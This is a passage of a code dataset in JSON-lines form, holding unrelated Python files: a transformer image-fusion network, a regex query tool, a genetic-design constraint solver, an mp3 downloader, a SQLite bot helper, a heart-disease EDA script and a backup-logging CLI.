1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up_eval(f_en[2], f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up_eval(f_en[1], x3_1)], 1))\n\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up_eval(f_en[0], x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\nclass AxialAttention(nn.Module):\n def __init__(self, in_planes, out_planes, groups=8, kernel_size=56,\n stride=1, bias=False, width=False):\n assert (in_planes % groups == 0) and (out_planes % groups == 0)\n super(AxialAttention, self).__init__()\n self.in_planes = in_planes\n self.out_planes = out_planes\n self.groups = groups\n self.group_planes = out_planes // groups\n self.kernel_size = kernel_size\n self.stride = stride\n self.bias = bias\n self.width = width\n\n # Multi-head self attention\n self.qkv_transform = qkv_transform(in_planes, out_planes * 2, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.bn_qkv = nn.BatchNorm1d(out_planes * 2)\n self.bn_similarity = nn.BatchNorm2d(groups * 3)\n\n self.bn_output = nn.BatchNorm1d(out_planes * 2)\n\n # Position embedding\n self.relative = nn.Parameter(torch.randn(self.group_planes * 2, kernel_size * 2 - 1), requires_grad=True)\n query_index = torch.arange(kernel_size).unsqueeze(0)\n key_index = torch.arange(kernel_size).unsqueeze(1)\n relative_index = key_index - query_index + kernel_size - 1\n self.register_buffer('flatten_index', relative_index.view(-1))\n if stride > 1:\n self.pooling = nn.AvgPool2d(stride, stride=stride)\n\n self.reset_parameters()\n\n def forward(self, x):\n \n if self.width:\n x = x.permute(0, 2, 1, 3)\n else:\n x = x.permute(0, 3, 1, 2) # N, W, C, H\n N, W, C, H = x.shape\n x = x.contiguous().view(N * W, C, H)\n\n # Transformations\n qkv = self.bn_qkv(self.qkv_transform(x))\n q, k, v = torch.split(qkv.reshape(N * W, self.groups, self.group_planes * 2, H), [self.group_planes // 2, self.group_planes // 2, self.group_planes], dim=2)\n\n # Calculate position embedding\n all_embeddings = torch.index_select(self.relative, 1, self.flatten_index).view(self.group_planes * 2, self.kernel_size, self.kernel_size)\n q_embedding, k_embedding, v_embedding = torch.split(all_embeddings, [self.group_planes // 2, self.group_planes // 2, self.group_planes], dim=0)\n #pdb.set_trace()\n \n qr = torch.einsum('bgci,cij->bgij', q, q_embedding)\n kr = torch.einsum('bgci,cij->bgij', k, k_embedding).transpose(2, 3)\n \n qk = torch.einsum('bgci, bgcj->bgij', q, k)\n \n stacked_similarity = torch.cat([qk, qr, kr], dim=1)\n stacked_similarity = self.bn_similarity(stacked_similarity).view(N * W, 3, self.groups, H, H).sum(dim=1)\n #stacked_similarity = self.bn_qr(qr) + self.bn_kr(kr) + self.bn_qk(qk)\n # (N, groups, H, H, W)\n similarity = F.softmax(stacked_similarity, dim=3)\n sv = torch.einsum('bgij,bgcj->bgci', similarity, v)\n sve = torch.einsum('bgij,cij->bgci', similarity, v_embedding)\n stacked_output = torch.cat([sv, sve], dim=-1).view(N * W, self.out_planes * 2, H)\n output = self.bn_output(stacked_output).view(N, W, self.out_planes, 2, H).sum(dim=-2)\n\n if self.width:\n output = output.permute(0, 2, 1, 3)\n else:\n output = output.permute(0, 2, 3, 1)\n\n if self.stride > 1:\n output = self.pooling(output)\n\n return output\n\n def reset_parameters(self):\n self.qkv_transform.weight.data.normal_(0, math.sqrt(1. / self.in_planes))\n #nn.init.uniform_(self.relative, -0.1, 0.1)\n nn.init.normal_(self.relative, 0., math.sqrt(1. / self.group_planes))\n\nclass AxialBlock(nn.Module):\n expansion = 2\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None, kernel_size=56):\n super(AxialBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n width = int(planes * (base_width / 64.))\n # Both self.conv2 and self.downsample layers downsample the input when stride != 1\n self.conv_down = conv1x1(inplanes, width)\n self.bn1 = norm_layer(width)\n self.hight_block = AxialAttention(width, width, groups=groups, kernel_size=kernel_size)\n self.width_block = AxialAttention(width, width, groups=groups, kernel_size=kernel_size, stride=stride, width=True)\n self.conv_up = conv1x1(width, planes * self.expansion)\n self.bn2 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv_down(x)\n out = self.bn1(out)\n out = self.relu(out)\n # print(out.shape)\n out = self.hight_block(out)\n out = self.width_block(out)\n out = self.relu(out)\n\n out = self.conv_up(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n","repo_name":"Vibashan/Image-Fusion-Transformer","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":22819,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"21"} +{"seq_id":"19941078576","text":"#!/usr/bin/env python3\nfrom __future__ import annotations\n\nfrom lib.search_tool import search_tools\nfrom lib.utils import dunders\n\n\nclass query_tool(search_tools, dunders):\n \"\"\"Query tool class containing methods to run queries for regex patterns in files.\n\n Args:\n * `fl` (str): Input file.\n * `pattern` (str): Input pattern.\n \"\"\"\n\n def __init__(self, fl: str, pattern: str) -> None:\n super().__init__(fl, pattern)\n\n @staticmethod\n def _dict_parser(dictionary: dict) -> tuple[str, str]:\n \"\"\"Dictionary parser.\n\n Args:\n * `dictionary` (dict): Dictionary object.\n\n Returns:\n `tuple[str, str]`: keys and values of a dictionary as separate strings.\n \"\"\"\n\n keys = []\n values = []\n for key, value in dictionary.items():\n keys.append(key)\n values.append(value)\n\n keys = tuple(keys)\n keys = \", \".join(keys)\n values = tuple(values)\n values = \", \".join(values)\n return keys, values\n\n def query_wrapper(self, show_idx) -> dict:\n \"\"\"Run an SQL or txt file query. This method is a wrapper to the methods holding the queries.\n\n Args:\n * `show_idx` (bool): Shows regex information in stdout.\n\n Returns:\n `dict`: Keys are equal to file locations and values are matched information.\n \"\"\"\n\n matches = self._get_matches()\n keys, values = self._dict_parser(dictionary = matches)\n\n if show_idx:\n print(f\"There are {len(matches)} matches to the pattern: {self.pattern}\")\n if self.fl.endswith(self.txt_ext):\n if len(keys) > 1:\n print(f\"Pattern can be found on lines: {keys}.\")\n else:\n print(f\"Pattern can be found on line {keys}.\")\n elif self.fl.endswith('.csv'):\n if len(keys) > 1:\n print(f\"Pattern can be found on columns: {keys}.\")\n else:\n print(f\"Pattern can be found on column {keys}.\")\n\n out_dict = {}\n for key, value in zip(list(keys.split(\",\")), list(values.split(\",\"))):\n out_dict[key] = value\n return out_dict\n","repo_name":"CSynodinos/query-tool","sub_path":"lib/query_parser.py","file_name":"query_parser.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24329186808","text":"from constraint import *\nimport json\nimport os\n\nclass genepy:\n def __init__(self, length: int, check_conflicts=False):\n if length < 1:\n raise Exception('invalid length')\n else:\n self.length = length\n\n self.check_conflicts = check_conflicts\n self.rules = {\n 'morethan': {},\n 'contains': {},\n 'exactly': {},\n 'then': {},\n 'witH': {},\n 'startswith': {},\n 'endswith': {},\n 'all_after': {},\n 'some_after': {},\n 'all_before': {},\n 'some_before': {},\n 'all_nextto': {},\n 'some_nextto': {},\n 'all_forward_if': {},\n 'all_reverse_if': {},\n 'some_forward': {},\n 'some_reverse': {},\n 'all_forward': {},\n 'all_reverse': {},\n 'represses': {},\n 'induces': {},\n 'drives': {}\n }\n self.problem = Problem()\n self.solutions = None\n\n self.containsParts = None\n self.morethanParts = None\n self.morethanValues = None\n self.exactlyParts = None\n self.exactlyValues = None\n self.thenPartsA = None\n self.thenPartsB = None\n\n def change_length(self, arg: int):\n \"\"\"Change sequence length after initilization. Must be called BEFORE generating solutions.\"\"\"\n if arg < 1:\n raise Exception('invalid length')\n else:\n self.length = arg\n\n # User methods to implement Eugene rules\n # Counting Rules\n def morethan(self, a: str, n: int):\n \"\"\"a MORETHAN n --> morethan(a, n)\"\"\"\n if n > self.length or n < 1:\n raise Exception('invalid n')\n else:\n self.rules['morethan'][a] = n\n\n def contains(self, a: str):\n \"\"\"CONTAINS a --> contains(a)\"\"\"\n self.rules['contains'][a] = True\n\n def exactly(self, a: str, n: int):\n \"\"\"a EXACTLY n --> exactly(a, n) \"\"\"\n if n > self.length:\n raise Exception('invalid n: n must be less than or equal to N')\n else:\n self.rules['exactly'][a] = n\n\n def then(self, a: str, B: str):\n \"\"\"a THEN B --> then(a, B)\"\"\"\n self.rules['then'][a] = B\n\n def witH(self, a: str, B: str):\n \"\"\"a WITH B ---> witH(a, B)\"\"\"\n self.rules['witH'][a] = B\n\n # Positioning Rules\n def startswith(self, a: str):\n \"\"\"STARTSWITH a --> startswith(a) \"\"\"\n self.rules['startswith'][a] = True\n\n def endswith(self, a: str):\n \"\"\"ENDSWITH a --> endswith(a)\"\"\"\n self.rules['endswith'][a] = True\n\n def all_after(self, a: str, B: list):\n \"\"\"a ALL_AFTER B / a AFTER B --> all_after(a, B)\"\"\"\n self.rules['all_after'][a] = B\n\n def some_after(self, a: str, B: list):\n \"\"\"a SOME_AFTER B --> some_after(a, B)\"\"\"\n self.rules['some_after'][a] = B\n\n def all_before(self, a: str, B: list):\n \"\"\"a ALL_BEFORE B --> all_before(a, B)\"\"\"\n self.rules['all_before'][a] = B\n\n def some_before(self, a: str, B: list):\n \"\"\"a SOME_BEFORE B --> some_before(a, B)\"\"\"\n self.rules['some_before'][a] = B\n\n def all_nextto(self, a: str, B: list):\n \"\"\"a ALL_NEXTTO B --> all_nextto(a, B)\"\"\"\n self.rules['all_nextto'][a] = B\n\n def some_nextto(self, a: str, B: list):\n \"\"\"a SOME_NEXTTO B --> some_nextto(a, B)\"\"\"\n self.rules['some_nextto'][a] = B\n\n # Orientation Rules\n def all_forward_if(self, a: str):\n \"\"\"ALL_FORWARD a --> all_forward(a)\"\"\"\n self.rules['all_forward_if'][a] = True\n\n def all_reverse_if(self, a: str):\n \"\"\"ALL_REVERSE a --> all_reverse_if(a)\"\"\"\n self.rules['all_reverse_if'][a] = True\n\n def some_forward(self, a: str):\n \"\"\"SOME_FORWARD a --> some_forward(a)\"\"\"\n self.rules['some_forward'][a] = True\n\n def some_reverse(self, a: str):\n \"\"\"SOME_REVERSE a --> some_reverse(a)\"\"\"\n self.rules['some_reverse'][a] = True\n\n def all_forward(self):\n \"\"\"ALL_FORWARD --> all_forward()\"\"\"\n self.rules['all_forward'] = True\n\n def all_reverse(self):\n \"\"\"ALL_REVERSE --> all_reverse()\"\"\"\n self.rules['all_reverse'] = True\n\n # Interaction Rules\n def represses(self, a: str, B: str):\n \"\"\"g REPRESSES p --> represses(g, p)\"\"\"\n self.rules['represses'][a] = B\n\n def induces(self, a: str, B: str):\n \"\"\"a INDUCES B --> induces(a, B)\"\"\"\n self.rules['induces'][a] = B\n\n def drives(self, a: str, B: str):\n \"\"\"a DRIVES B --> drives(a, B)\"\"\"\n self.rules['drives'][a] = B\n\n\n # Constraint methods for python-constraint solver\n # Not inteded for user\n def containsConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'contains()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n parts = self.containsParts\n count = 0\n for x in range(len(parts)):\n if parts[x] in variables:\n count += 1\n if count == len(parts):\n return True\n else:\n return False\n\n def morethanConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'morethan()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n parts = self.morethanParts\n n = self.morethanValues\n count = 0\n for x in range(len(parts)):\n if variables.count(parts[x]) > n[x]:\n count += 1\n if count == len(parts):\n return True\n else:\n return False\n\n def exactlyConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'exactly()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n parts = self.exactlyParts\n n = self.exactlyValues\n count = 0\n for x in range(len(parts)):\n if variables.count(parts[x]) == n[x]:\n count += 1\n if count == len(parts):\n return True\n else:\n return False\n\n def thenConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'then()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = self.thenPartsA\n partsB = self.thenPartsB\n count = 0\n for x in range(len(partsA)):\n if partsA[x] in variables:\n if partsB[x] in variables:\n count += 1\n if count == len(partsA):\n return True\n else:\n return False\n\n def withConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'witH()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = self.witHPartsA\n partsB = self.witHPartsB\n count = 0\n for x in range(len(partsA)):\n if (partsA[x] in variables) and (partsB[x] in variables):\n if partsB in variables:\n count += 1\n if count == len(partsA):\n return True\n else:\n return False\n\n def startswithConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'startswith()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n ruleList = list(self.rules[\"startswith\"].keys())\n if len(ruleList) > 1:\n print(\"startswith used on multiple parts\")\n return False\n if ruleList[0] in variables:\n if variables[0] == ruleList[0]:\n return True\n else:\n return False\n\n def endswithConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'endswith()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n ruleList = list(self.rules[\"endswith\"].keys())\n if len(ruleList) > 1:\n print(\"endswith used on multiple parts\")\n return False\n if ruleList[0] in variables:\n if variables[len(variables)-1] == ruleList[0]:\n return True\n else:\n return False\n\n def all_afterConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'all_after()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = list(self.rules[\"all_after\"].keys())\n partsB = list(self.rules[\"all_after\"].values())\n firstA = None\n lastB = None\n for x in range(len(variables)):\n done = False\n for i in range(len(partsA)):\n if partsA[i] == variables[x]:\n firstA = x\n done = True\n break\n if done:\n break\n\n for x in range(len(variables)):\n for i in range(len(partsB)):\n if partsB[i] == variables[x]:\n lastB = x\n if lastB < firstA:\n return True\n else:\n return False\n\n def some_afterConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'some_after()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = list(self.rules[\"some_after\"].keys())\n partsB = list(self.rules[\"some_after\"].values())\n foundA = []\n foundB = []\n for x in range(len(variables)):\n if variables[x] in partsA:\n foundA.append(x)\n if variables[x] in partsB:\n foundB.append(x)\n for a in foundA:\n for b in foundB:\n if b < a:\n return True\n return False\n\n def all_beforeConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'all_before()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = list(self.rules[\"all_before\"].keys())\n partsB = list(self.rules[\"all_before\"].values())\n firstB = None\n lastA = None\n for x in range(len(variables)):\n done = False\n for i in range(len(partsB)):\n if partsB[i] == variables[x]:\n firstB = x\n done = True\n break\n if done:\n break\n\n for x in range(len(variables)):\n for i in range(len(partsA)):\n if partsA[i] == variables[x]:\n lastA = x\n if lastA < firstB:\n return True\n else:\n return False\n\n def some_beforeConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'some_before()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = list(self.rules[\"some_before\"].keys())\n partsB = list(self.rules[\"some_before\"].values())\n foundA = []\n foundB = []\n for x in range(len(variables)):\n if variables[x] in partsA:\n foundA.append(x)\n if variables[x] in partsB:\n foundB.append(x)\n for a in foundA:\n for b in foundB:\n if a < b:\n return True\n return False\n\n def generate(self, number=0):\n \"\"\"Return all sequences that satifies user described constraints. If not given a number for sequences method returns all solutions.\"\"\"\n # Create domain for each position in sequence using Counting rules\n self.containsParts = list(self.rules[\"contains\"].keys())\n self.morethanParts = list(self.rules[\"morethan\"].keys())\n self.morethanValues = list(self.rules[\"morethan\"].values())\n self.exactlyParts = list(self.rules[\"exactly\"].keys())\n self.exactlyValues = list(self.rules[\"exactly\"].values())\n self.thenPartsA = list(self.rules[\"then\"].keys())\n self.thenPartsB = list(self.rules[\"then\"].values())\n self.witHPartsA = list(self.rules[\"witH\"].keys())\n self.witHPartsB = list(self.rules[\"witH\"].values())\n domain = self.morethanParts + self.containsParts + self.exactlyParts + self.thenPartsA + self.thenPartsB + self.witHPartsA + self.witHPartsB\n self.problem.addVariables(range(self.length), domain)\n\n # If certain rule was implemented by user, then apply to solver\n if self.rules[\"contains\"]:\n self.problem.addConstraint(self.containsConstraint, list(range(self.length)))\n if self.rules[\"morethan\"]:\n self.problem.addConstraint(self.morethanConstraint, list(range(self.length)))\n if self.rules[\"exactly\"]:\n self.problem.addConstraint(self.exactlyConstraint, list(range(self.length)))\n if self.rules[\"then\"]:\n self.problem.addConstraint(self.thenConstraint, list(range(self.length)))\n if self.rules[\"witH\"]:\n self.problem.addConstraint(self.withConstraint, list(range(self.length)))\n if self.rules[\"startswith\"]:\n self.problem.addConstraint(self.startswithConstraint, list(range(self.length)))\n if self.rules[\"endswith\"]:\n self.problem.addConstraint(self.endswithConstraint, list(range(self.length)))\n if self.rules[\"all_after\"]:\n self.problem.addConstraint(self.all_afterConstraint, list(range(self.length)))\n if self.rules[\"some_after\"]:\n self.problem.addConstraint(self.some_afterConstraint, list(range(self.length)))\n if self.rules[\"all_before\"]:\n self.problem.addConstraint(self.all_beforeConstraint, list(range(self.length)))\n if self.rules[\"some_before\"]:\n self.problem.addConstraint(self.some_beforeConstraint, list(range(self.length)))\n\n # Return solutions\n if number == 0:\n self.solutions = self.problem.getSolutions()\n return self.solutions\n # Generate one solution\n if number == 1:\n # Use MinConflictsSolver to quickly generate single solution\n solver = MinConflictsSolver()\n self.problem.setSolver(solver)\n while self.solutions == None:\n self.solutions = self.problem.getSolution()\n return self.solutions\n # Generate user defined number of solutions using default backtracking solver\n else:\n self.solutions = self.problem.getSolutions()\n return self.solutions[0:number]\n\n # Write generated solutions to JSON file, stored in Solutions directory\n def solutionsToFile(self, filename, number=0):\n \"\"\"Write generated solutions to json file. If not given a number all solutions are written to the file\"\"\"\n fileCheck = os.path.splitext(filename)\n if fileCheck[1] != \".json\":\n raise Exception(\"Filename must be of type json\")\n path = \"./Solutions/\" + filename\n\n f = open(path, \"w\")\n if number == 0:\n json.dump(self.solutions, f)\n f.close()\n else:\n json.dump(self.solutions[0:number], f)\n f.close()\n\n # Write declared rules to JSON file, stored in Rules directory\n def rulesToFile(self, filename):\n \"\"\"Write rules to json file.\"\"\"\n fileCheck = os.path.splitext(filename)\n if fileCheck[1] != \".json\":\n raise Exception(\"Filename must be of type json\")\n path = \"./Rules/\" + filename\n\n f = open(path, \"w\")\n json.dump(self.rules, f)\n f.close()\n","repo_name":"hkim42/GenePy","sub_path":"Code/genepy/genepy.py","file_name":"genepy.py","file_ext":"py","file_size_in_byte":15931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70800228589","text":"import os\n\nimport requests\nfrom tqdm import tqdm\n\n\ndef download_mp3_files(urls, download_dir):\n \"\"\"\n Downloads mp3 files from a url list\n \"\"\"\n with requests.Session() as request:\n for url in urls:\n name = url.split('.mp3')[0].split('/')[-1]\n response = request.get(url, stream=True)\n\n total_size_in_bytes = int(response.headers.get('content-length', 0))\n block_size = 1024\n progress_bar = tqdm(total=total_size_in_bytes, unit='iB', unit_scale=True, colour='blue')\n\n if response.status_code == 200:\n path = os.path.join(download_dir, name + '.mp3')\n with open(path, 'wb') as file:\n for data in response.iter_content(block_size):\n progress_bar.update(len(data))\n file.write(data)\n\n progress_bar.close()\n\n if total_size_in_bytes != 0 and progress_bar.n != total_size_in_bytes:\n print('Something went wrong!')\n","repo_name":"sitek94/download-mp3s-with-python","sub_path":"download_mp3_files.py","file_name":"download_mp3_files.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30669912082","text":"from dataclasses import make_dataclass,dataclass\nimport sqlite3 as sql\n\nclass InfoClass:\n \"\"\"Класс с информацией из базы данных экземпляра класса Bot (self.info) \n \"\"\"\n def __get_tables_with_column(self):\n \n \n # INSERT INTO UserGroups (UserID) VALUES (435170678);\n \n data = {}\n \n # Названия всех таблиц\n self.cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables = tuple([i[0] for i in self.cursor.fetchall()])\n \n # Перебираем таблицы и проверяем, есть ли в них желаемая колонка\n for table_name in tables:\n self.cursor.execute(f\"PRAGMA table_info({table_name});\")\n columns_name = tuple([column[1] for column in self.cursor.fetchall()])\n \n \n \n if 'UserID' in columns_name:\n self.cursor.execute(f'''SELECT * FROM {table_name} WHERE UserID = {self.ID} ''')\n columns_data = self.cursor.fetchall()\n if len(columns_data) != 0:\n columns_data = columns_data[0]\n elif len(columns_data) == 0 : \n columns_data = [None for _ in range(len(columns_name))]\n \n for cn,cd in zip(columns_name,columns_data):\n data[cn] = cd\n \n return data\n \n def __init__(self, database : str, ID : int) -> None:\n self.ID = ID\n # self.database = database.connection\n self.database = sql.connect(database)\n self.cursor = self.database.cursor()\n self.TABLES = self.__get_tables_with_column()\n \n def GetData(self) -> dataclass:\n db_dataclass = make_dataclass(\"Database\", self.__get_tables_with_column().keys())\n return db_dataclass(**self.__get_tables_with_column())\n","repo_name":"QuoNaro/kgtt-bot","sub_path":"src/kgtt_bot/vk/infoclass.py","file_name":"infoclass.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73884823148","text":"#https://www.kaggle.com/fabijanbajo/heart-disease-prediction\r\n\r\n#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# In[1]:\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('ggplot')\r\n#get_ipython().run_line_magic('matplotlib', 'inline')\r\n\r\n\r\n# In[2]:\r\n\r\n\r\n#import dataset while naming columns\r\ncols = ['age','sex','cp','trestbps','chol','fbs','restecg','thalach','exang','oldpeak','slope','ca','thal','num']\r\nurl=\"C:/Users/venkat/Desktop/ufa/coursework/sem-2/Dr Beth/knn_clustering/HeartDisease_Cleaveland - Copy.csv\"\r\ndf = pd.read_csv(url, index_col=False, names=cols, header=None)\r\n\r\n\r\n# In[3]:\r\n\r\n\r\ndf.head()\r\n\r\n\r\n# In[4]:\r\n\r\n\r\ndf.describe()\r\n\r\n\r\n# In[5]:\r\n\r\n\r\ndf.info()\r\n\r\n\r\n# In[7]:\r\n\r\n\r\n#investigate object datatypes\r\nprint(df['ca'].unique())\r\nprint(df['thal'].unique())\r\n\r\n\r\n# In[9]:\r\n\r\n\r\n#replace '?' with 'np.nan' for now to avoid errors in eda\r\n#cast dtypes as float\r\ndef clean(x):\r\n if x.strip() == '?':\r\n return np.nan\r\n else:\r\n return x\r\n\r\ndf['ca'] = df['ca'].apply(clean).astype('float64')\r\ndf['thal'] = df['thal'].apply(clean).astype('float64')\r\nprint(df['ca'].unique())\r\nprint(df['thal'].unique())\r\n\r\n\r\n# In[10]:\r\n\r\n\r\ndf.info()\r\n\r\n\r\n# In[12]:\r\n\r\n\r\ndf.dropna(inplace=True)\r\nprint(df.shape)\r\n\r\n\r\n# In[14]:\r\n\r\n\r\nfor col in df.columns.tolist():\r\n print(col, len(df[col].unique()))\r\n\r\n\r\n# In[17]:\r\n\r\n\r\n#separate categorical variables from continuous\r\ncat_var = [col for col in df.columns.tolist() if len(df[col].unique()) <=5]\r\nprint(len(cat_var))\r\ncont_var = [col for col in df.columns.tolist() if len(df[col].unique()) > 5]\r\nprint(len(cont_var))\r\n\r\n\r\n# In[18]:\r\n\r\n\r\n#explore distributions of continuous variables\r\nfig, axes = plt.subplots(3,2, figsize=(12,10))\r\nfor i, ax in enumerate(axes.flatten()):\r\n column_name = cont_var[i]\r\n ax.hist(df[column_name])\r\n ax.set_title(column_name)\r\n\r\nplt.tightlayout()\r\n\r\n\r\n# In[19]:\r\n\r\n\r\nfig, axes = plt.subplots(2, 5, figsize=(12,10))\r\nfor i, ax in enumerate(axes.flatten()):\r\n column_name = cat_var[i]\r\n ax.hist(df[column_name])\r\n ax.set_title(column_name)\r\n\r\nplt.tightlayout()\r\n\r\n\r\n# In[20]:\r\n\r\n\r\n#closer look at predictor column for class imbalance\r\nfloat(df[df['num'] > 0].shape[0]) / df['num'].shape[0]\r\n\r\n\r\n# In[21]:\r\n\r\n\r\ndf.head()\r\n\r\n\r\n# In[22]:\r\n\r\n\r\nfig, (ax1, ax2) = plt.subplots(1,2, figsize=(8, 4))\r\nax1.hist(df['num'])\r\nax1.set_title('Predictor Column')\r\n\r\n#change predictor ('num') col to boolean\r\ndf['num'] = df['num'] > 0\r\ndf['num'] = df['num'].map({False: 0, True: 1})\r\n\r\nax2.hist(df['num'])\r\nax2.set_title('Predictor Column Cleaned')\r\nplt.xticks([0,1], ['No Heart Disease', 'Heart Disease'])\r\nplt.tight_layout()\r\nplt.savefig('predictor_column.png')\r\n\r\n\r\n# In[23]:\r\n\r\n\r\n#covariance matrix for looking into dimensionality reduction\r\nfrom sklearn.preprocessing import scale\r\ncdf = df.copy()\r\ncdf.pop('num')\r\ncdf = pd.DataFrame(scale(cdf.values), columns=cdf.columns.tolist())\r\ncdf.cov()\r\n\r\n\r\n# In[25]:\r\n\r\n\r\n#identify higher correlation values\r\nfor col in cdf.columns.tolist():\r\n mask = cdf.cov()[col].argsort()\r\n print(col, cdf.cov()[col][mask][-2])\r\nmask = cdf.cov() > 0.3\r\nmask\r\n\r\n\r\n# In[26]:\r\n\r\n\r\ndf.corr()\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"gigya74/python","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70752401386","text":"import click\nimport datetime\nimport pathlib\nimport pydoni\nimport shutil\nimport subprocess\nimport termtables as tt\nimport time\nfrom .common import Verbose\nfrom os import makedirs, stat, mkdir, rmdir\nfrom os.path import basename, dirname, isfile, isdir, getmtime, join, getctime, expanduser\nfrom send2trash import send2trash\n\n\n@click.option('--table-schema', type=str, default='pydonicli',\n help='Postgres directory backup table schema name.')\n@click.option('--table-name', type=str, default='directory_backup',\n help='Postgres directory backup table name.')\n@click.option('--source', type=str,\n help='Source directory path.')\n@click.option('--source-size-bytes', type=int, default=None,\n help='Size of source directory in bytes.')\n@click.option('--target', type=str,\n help='Target directory path.')\n@click.option('--target-size-before-bytes', default=None, type=int,\n help='Size of target directory before backup in bytes.')\n@click.option('--target-size-after-bytes', default=None, type=int,\n help='Size of target directory after backup in bytes.')\n@click.option('--start-ts', type=float, default=None,\n help='UNIX timestamp of backup start time (output of `time.time()`).')\n@click.option('--end-ts', type=float, default=None,\n help='UNIX timestamp of backup end time (output of `time.time()`).')\n@click.option('--is-completed', type=bool, default=True,\n help='Boolean flag to indicate whether backup was completed successfully.')\n@click.option('-v', '--verbose', is_flag=True, default=False,\n help='Print program messages to console.')\n@click.command()\ndef append_backup_log_table(table_schema,\n table_name,\n source,\n source_size_bytes,\n target,\n target_size_before_bytes,\n target_size_after_bytes,\n start_ts,\n end_ts,\n is_completed,\n verbose):\n \"\"\"\n Append a record to directory backup Postgres table. To be used if a backup is carried\n out without the use of the `pydoni data backup` command which handles the table insert\n automatically, but when the backup would still like to be logged in the log table.\n \"\"\"\n args, result = pydoni.__pydonicli_declare_args__(locals()), dict()\n\n vb = Verbose(verbose)\n pg = pydoni.Postgres()\n\n sql_value_dct = dict(source=source,\n source_size_bytes=source_size_bytes,\n target=target,\n target_size_before_bytes=target_size_before_bytes,\n target_size_after_bytes=target_size_after_bytes,\n start_ts=datetime.datetime.fromtimestamp(start_ts),\n end_ts=datetime.datetime.fromtimestamp(end_ts),\n is_completed=is_completed)\n\n vb.info(f'table_schema: {table_schema}')\n vb.info(f'table_name: {table_name}')\n for k, v in sql_value_dct.items():\n vb.info(f'{k}: {v}')\n\n insert_sql = pg.build_insert(schema_name=table_schema,\n table_name=table_name,\n columns=[k for k, v in sql_value_dct.items()],\n values=[v for k, v in sql_value_dct.items()])\n\n pg.execute(insert_sql)\n\n vb.info(f'Appended record to {table_schema}.{table_name}')\n result['sql_value_dct'] = sql_value_dct\n\n vb.program_complete('Append to backup log table complete')\n\n pydoni.__pydonicli_register__(dict(args=args, result=result, command_name='data.append_backup_log_table'))\n\n\ndef is_file_changed(sourcefile, targetfile):\n \"\"\"\n Detect whether a target file has been changed from its corresponding source file\n by determining whether the source and target file change datetimes are different\n by more than a threshold value (i.e. 1%).\n \"\"\"\n def pct_change(num1, num2):\n \"\"\"\n Return the pecentage change from `num1` -> `num2` on a scale from 0-100.\n \"\"\"\n return abs(100.0 * (num2*1.0 - num1*1.0) / num1*1.0)\n\n mtime_source = getmtime(sourcefile)\n mtime_target = getmtime(targetfile)\n\n return pct_change(mtime_source, mtime_target) > 1.0\n\n@click.option('--source', type=click.Path(exists=True), required=True,\n help='Absolute path to source directory.')\n@click.option('--target', type=click.Path(exists=True), required=True,\n 